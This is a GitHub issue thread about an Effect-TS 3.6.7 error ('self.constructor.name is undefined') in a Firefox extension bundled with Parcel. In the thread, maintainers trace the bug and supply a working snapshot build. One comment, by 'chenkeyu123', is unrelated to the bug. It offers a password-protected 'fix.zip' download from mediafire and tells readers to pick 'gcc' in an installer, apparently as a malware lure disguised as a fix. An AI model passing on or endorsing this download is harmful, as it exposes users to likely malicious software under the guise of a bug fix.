### ISSUE TITLE
TypeError: self.constructor.name is undefined

### ISSUE THREAD

**Issue by techjpiron** [Effect-TS/effect#3509]
### What version of Effect is running?

3.6.7

### What steps can reproduce the bug?

The issue arises when using Effect inside a Web extension bundled with Parcel.

I try to run this code as content script:

```js
import { Effect } from "effect";

console.log("Hello world");

Effect.runSync(Effect.log("Hello from Effect"));

```

It works fine with Effect 3.5.0. With version 3.6.7, I get the following error message: "TypeError: self.constructor.name is undefined"

### What is the expected behavior?

timestamp=2024-08-28T08:11:04.689Z level=INFO fiber=#0 message="Hello from Effect"

### What do you see instead?

TypeError: self.constructor.name is undefined[logger.ts:427:2](moz-extension://4c3bd57d-f571-4f0b-9c93-830ca3f76eb7/node_modules/.pnpm/effect@3.6.7/node_modules/effect/src/internal/logger.ts)
    krw6c logger.ts:427
    newRequire content.ae1dba72.js:71
    localRequire content.ae1dba72.js:84
    ["6tjKh"]< fiberRuntime.ts:62
    newRequire content.ae1dba72.js:71
    localRequire content.ae1dba72.js:84
    k5VPj console.ts:10
    newRequire content.ae1dba72.js:71
    localRequire content.ae1dba72.js:84
    ["6X8u3"]< Effect.ts:28
    newRequire content.ae1dba72.js:71
    localRequire content.ae1dba72.js:84
    fleaD index.ts:218
    newRequire content.ae1dba72.js:71
    localRequire content.ae1dba72.js:84
    ["6cTCN"]< content.js:1
    newRequire content.ae1dba72.js:71
    <anonymous> content.ae1dba72.js:122
    <anonymous> content.ae1dba72.js:145
    inject ExtensionContent.sys.mjs:581
    AsyncFunctionNext self-hosted:852

### Additional information

Failing code (3.6.7): https://github.com/techjpiron/effect-webext-error
Working code (3.5.0): https://github.com/techjpiron/effect-webext-error/tree/effect-3.5.0

**Comment by fubhy** [comment]
Hi. It's difficult to reproduce the error because you did not leave instructions for how to run your example code.

The `pnpm start` command brings up a server at localhost:1234 but there's nothing there and I'm not familiar with parcel.

Either way, it seems that this commit might be the culprit: https://github.com/Effect-TS/effect/commit/dabd028decf9b7983ca16ebe0f48c05c11a84b68

Although it would appear that this is actually a problem with Parcel. `self.constructor` should never be undefined from what I understand.

**Comment by fubhy** [comment]
It appears that Parcel is in violation of this: https://developer.mozilla.org/en-US/docs/Web/API/Window/self

**Comment by fubhy** [comment]
@techjpiron Can you please test with this snapshot version here? https://pkg.pr.new/Effect-TS/effect@889efa9

**Comment by techjpiron** [comment]
Hi @fubhy,

Thank you for your quick reply!

The provided snapshot version works 👍 

To run the extension, you have to:
1. Start the dev server `pnpm start`
2. Open Firefox
3. Open the page `about:debugging#/runtime/this-firefox`
4. Click on the Button `Load temporary Add-on`
5. Select the `manifest.json` file in the `dist` folder

**Comment by fubhy** [comment]
Aaaah, this is a browser extension. Sorry it's still early :-D

I cannot reproduce that in chrome. Installing firefox now to see if that's a problem there.

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by techjpiron** [comment]
Thank you very much for the quick fix @fubhy!

**Comment by fubhy** [comment]
> Thank you very much for the quick fix @fubhy!

That was Tim in the end (he hijacked my PR :-P)
